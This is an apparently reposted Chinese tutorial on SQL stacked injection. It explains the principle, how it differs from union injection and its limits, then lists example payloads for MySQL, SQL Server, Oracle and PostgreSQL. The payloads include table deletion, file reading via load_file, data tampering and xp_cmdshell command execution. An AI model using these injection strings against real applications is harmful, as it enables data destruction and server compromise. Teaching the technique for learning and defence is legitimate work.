第八部分：Stacked injections-堆叠注入

Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆 sql 语句（多条）一起执行。而在真实的运用中也是这样的，我们知道在 mysql 中，主要是命令行中，每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。

0x01  原理介绍

在 SQL 中，分号 ； 是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而 union injection （联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于 union或者 union all 执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。
例如以下这个例子：

用户输入：
1; DELETE FROM products
服务器端生成的 sql 语句为：（因未对输入的参数进行过滤）
Select * from products where productid=1;DELETE FROM products

当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。

 0x02  堆叠注入的局限性

堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到 API 或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

Ps：此图提到访问MySQL，PHP是不允许查询的，这是在PHP 5.0之前确实是这样的，但在PHP 5.0之后，使用了MySQLi函数集，也就有了 mysqli_multi_query()函数，它支持多个查询用分号进行分隔。（要特别注意一些技术文章的时间，计算机发展很快）

在我们的 web 系统中，因为代码通常只返回一个查询结果，因此，堆叠注入第二个语句产生错误或者结果只能被忽略，我们在前端界面是无法看到返回结果的。因此，在读取数据时，我们建议使用 union（联合）注入。同时在使用堆叠注入之前，我们也是需要知道一些数据库相关信息的，例如表名，列名等信息。

0x03  各个数据库实例介绍

本节我们从常用数据库角度出发，介绍几个类型的数据库的相关用法。数据库的基本操作，
增删查改。以下列出数据库相关堆叠注入的基本操作。

Mysql  数据库

（1 ）新建一个表 select * from users where id=1;create table test like users;

执行成功，我们再去看一下是否新建成功表。

（2）删除上面新建的 test 表 select * from users where id=1;drop table test

（3）查询数据 select * from users where id=1;select 1,2,3

加载文件 select * from users where id=1;select load_file('c:/test.php');

（4）修改数据 select * from users where id=1;insert into users(id,username,password) values('100','new','new');

Sql server  数据库

(1)增加数据表 select * from test;create table sc3(ss CHAR(8));

（2）删除数据表 select * from test;drop table sc3;

(3)查询数据 select 1,2,3;select * from test;

（4）修改数据 select * from test;update test set name='test' where id=3;

（5）sqlserver 中最为重要的存储过程的执行

select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

Oracle  数据库

上面的介绍中我们已经提及，oracle 不能使用堆叠注入，可以从图中看到，当有两条语句在同一行时，直接报错。无效字符。后面的就不往下继续尝试了。

Postgresql  数据库

（1）新建一个表 select* from user_test;create table user_data(id DATE);

可以看到 user_data 表已经建好。
（2）删除上面新建的 user_data 表 select * from user_test;delete from user_data;

(3)查询数据 select * from user_test;select 1,2,3;

(4)修改数据 select * from user_test;update user_test set name='modify' where name='张三';

最后

以上就是幽默面包为你收集整理的第八部分：Stacked injections-堆叠注入的全部内容，希望文章能够帮你解决第八部分：Stacked injections-堆叠注入所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。